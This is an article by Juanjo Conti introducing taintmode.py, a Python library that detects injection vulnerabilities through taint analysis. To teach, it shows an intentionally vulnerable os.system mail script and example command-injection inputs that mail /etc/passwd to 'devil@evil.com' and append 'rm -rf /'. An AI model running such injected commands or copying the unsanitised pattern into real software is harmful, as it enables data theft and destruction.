--------------------
Taint Mode in Python
--------------------
.. class:: endnote
+-------------------------------------------+-------------------------------------------+
| .. image:: ../taint/juanjodetraje.jpg |**Author:** Juanjo Conti |
| :class: right foto | |
| |Juanjo is an Information Systems Engineer. |
| |Have been coding in Python for the last |
| |5 years and use it for job, research and |
| |fun. |
| | |
| |**Blog:** http://juanjoconti.com.ar |
| | |
| |**Email:** jjconti@gmail.com |
| | |
| |**Twitter:** @jjconti |
| | |
| | |
| | |
| | |
+-------------------------------------------+-------------------------------------------+
This article is based on the paper *A Taint Mode for Python via a Library* that I wrote
with Dr. Alejandro Russo from Chalmers University of Technology, Gothenburg, Sweden
and was presented at OWASP App Sec Research 2010 conference.
Opening words
-------------
Vulnerabilities in web applications present threats to on-line systems.
SQL injection and cross-site scripting attacks are among the
most common threats found nowadays. These attacks are
often result of improper or non-existent input validation.
To help discover such vulnerabilities,
popular web scripting
languages like Perl, Ruby, PHP,
and Python perform taint analysis.
Such analysis is often
implemented as an execution monitor, where the interpreter
needs to be adapted to provide a taint mode.
However, modifying interpreters might be a major task in its own
right. In fact, it is very likely that
new releases of interpreters require to
be adapted to provide a taint mode.
Differently from previous approaches,
taintmode.py provides taint analysis for Python via a library
written entirely in Python, and thus avoiding modifications in the interpreter.
The concepts of classes, decorators and dynamic dispatch
makes our solution lightweight, easy to use, and particularly neat.
With little or no effort, the library can be adapted
to work with different Python interpreters.
Taint Analysis concepts
-----------------------
First, let's talk about the basic concepts:
**Untrusted Sources**. Untrusted data is marked as tainted.
Examples of this are: any data received as a GET or POST parameter,
HTTP headers and AJAX requests. One may also consider marking data from
a persistence layer as tainted. A database may have been tampered with
outside the application, or the data could have been intercepted and
modified in transit.
**Sensitive Sinks** are those points in the system where we don't want
unvalidated data to arrive because an attack can be masked in the them.
Some examples of sensitive sinks are Browser or HTML template engine,
SQL, OS or LDAP interpreter; or even the Python interpreter.
The third element in scene are the sanitization methods; they allow us to
escape, encode or validate input data to make them fit to be sent to
any sink. An example of a sanitization function is Python's cgi.escape:
.. code-block:: pycon
>>> import cgi
>>> cgi.escape("")
"<script>alert('this is an attack')</script>"
How to use it?
--------------
This is an easy example on purpose; it lets us understand the concepts without worrying
about the problem:
.. code-block:: python
import sys
import os
def get_data(args):
return args[1], args[2]
usermail, file = get_data(sys.argv)
cmd = 'mail -s "Requested file" ' + usermail + ' < ' + file
os.system(cmd)
The script receives an email address and a file name as input arguments.
As a result, it sends the file to its owner by mail.
The problem with this application is that the author didn't have in mind
some alternative uses that an attacker could try. Some examples are:
.. code-block:: bash
python email.py alice@domain.se ./reportJanuary.xls
python email.py devil@evil.com '/etc/passwd'
python email.py devil@evil.com '/etc/passwd ; rm -rf / '
The first example is the correct use of the application, the one in the
programmer's mind when it was written. The second one shows the first
vulnerability; an attacker may send himself the content of /etc/passwd.
The third example shows an even harder situation; the attacker not only
steals system sensitive information but also erases its files. Of course,
the execution of this scenario depends on how the server is configured and
the privileges of the attacker at the moment of executing the
application; but I think you got the idea.
So... how could this library help the programmer to be aware of these problems
and fix them? The first step is to import the components of the library and mark
sensitives sinks and untrusted sources. The modified version of the program is:
.. code-block:: python
import sys
import os
from taintmode import untrusted, ssink, cleaner, OSI
os.system = ssink(OSI)(os.system)
@untrusted
def get_data(args):
return [args[1], args[2]]
usermail, filename = get_data(sys.argv)
cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
os.system(cmd)
Note that we need to mark the get_data function as an untrusted source
(with the untrusted decorator) and os.system as a sink sensitive to
Operating System Injection (OSI) attacks.
Now, when we try to run the program (it's not important if we are trying
to make an attack or not) we get this message in the standard output:
.. code-block:: bash
$ python email.py jjconti@gmail.com myNotes.txt
===============================================================================
Violation in line 14 from file email.py
Tainted value: mail -s "Requested file" jjconti@gmail.com < miNotes.txt
-------------------------------------------------------------------------------
usermail, filename = get_data(sys.argv)
cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
--> os.system(cmd)
===============================================================================
The Library intercepts the execution just before the untrusted datum reach the
sensitive sink and inform it. The next step is add a cleaning function to sanitize
the input data:
.. code-block:: python
import sys
import os
from taintmode import untrusted, ssink, cleaner, OSI
from cleaners import clean_osi
clean_osi = cleaner(OSI)(clean_osi)
os.system = ssink(OSI)(os.system)
@untrusted
def get_data(args):
return [args[1], args[2]]
usermail, filename = get_data(sys.argv)
usermail = clean_osi(usermail)
filename = clean_osi(filename)
cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
os.system(cmd)
In this final example we import clean_osi, a function capable to clean
input data against OSI attacks and in the next line we mark it as
capable of doing it (this is required by the library).
Finally, we use the function to clean the program inputs. If we execute
the program now, it'll run normally.
How does it work?
-----------------
The library uses ids for the different vulnerabilities you are working with;
these are called tags. It also provides decorators to mark different
parts of the program (classes, methods or functions) as any of the
three elements mentioned in the section about Taint Analysis.
untrusted
~~~~~~~~~
untrusted is a decorator that indicates us the values returned by a function
or method aren't to be trusted. Untrusted values can be tainted with any vulnerability,
so they are marked as tainted with all the kinds of stain.
If you have access to the function or method definition, for example if it's part
of your codebase, the decorator can be applied using Python's syntactic sugar:
.. code-block:: python
@untrusted
def from_the_outside():
...
While using third-party modules, we still can apply the decorator. The next
example is from a program written using the web.py framework:
.. code-block:: python
import web
web.input = untrusted(web.input)
ssink
~~~~~
The ssink decorator must be used to mark those functions or methods that we
don't want to be reached for tainted values. We call them sensitive sinks.
These sinks are sensitive to a kind of vulnerability, and must be specified when
the decorator is used.
For example, the Python eval function is a sensitive sink to Interpreter
Injection attacks. The way we mark it as that is:
.. code-block:: python
eval = ssink(II)(eval)
The web.py framework offers SQL Injection sensitive sink examples:
.. code-block:: python
import web
db = web.database(dbn="sqlite", db=DB_NAME)
db.delete = ssink(SQLI)(db.delete)
db.select = ssink(SQLI)(db.select)
db.insert = ssink(SQLI)(db.insert)
Like the rest of decorators, if the sensitive sink is defined in our code, we can
use syntactic sugar:
.. code-block:: python
@ssink(XSS):
def render_answer(input):
...
The decorator can also be used without specifying a vulnerability. In this case,
the sink is marked as sensitive to every kind of vulnerability, although this is not
a very common use case:
.. code-block:: python
@ssink():
def very_sensitive(input):
...
When an X tainted value reaches an X sensitive sink, we are facing the existence
of a vulnerability and an appropriated mechanism is executed.
cleaner
~~~~~~~
cleaner is a decorator used to tell that a method or function is able to clean
stains on a value.
For example, the plain_text function removes HTML code from its input and returns
the new clean value:
.. code-block:: python
>>> plain_text("This is bold")
'This is bold'
>>> plain_text("Click here")
'Click here'
This kind of functions are associated with a determined kind of vulnerability;
so the right way to use the cleaner decorator is specifying the kind of stain.
Again, there are two was of doing it. In the definition:
.. code-block:: python
@cleaner(XSS)
def plain_text(input):
...
or before we start using the function in our program:
.. code-block:: python
plain_text = cleaner(XSS)(plain_text)
Taint aware
~~~~~~~~~~~
One of the main parts of the library takes care of tracking the taint information for built-in classes (like int or str).
The library dynamically defines subclasses of these to add an attribute
that alows that tracking; for each object the attribute consists of a set
of tags representing the taints the object has in a certain moment of the
execution. The objects are considered untainted when the tags set is empty.
In the context of the library, these subclasses are called
*taint-aware classes*. The inherited methods of built-in classes are redefined
to make them capable to propagate the taint information.
For example, if a and b are tainted objects, c will have the union of
the taints of both:
.. code-block:: python
c = a.action(b)
Present state
-------------
In this brief article I've exposed the main characteristics of the library;
to know more advanced features and other implementation details you can
visit http://www.juanjoconti.com.ar/taint/
More information & links
------------------------
* OWASP App Sec 2010: http://alturl.com/5u94e
* OWASP: http://www.owasp.org
* Python security: http://www.pythonsecurity.org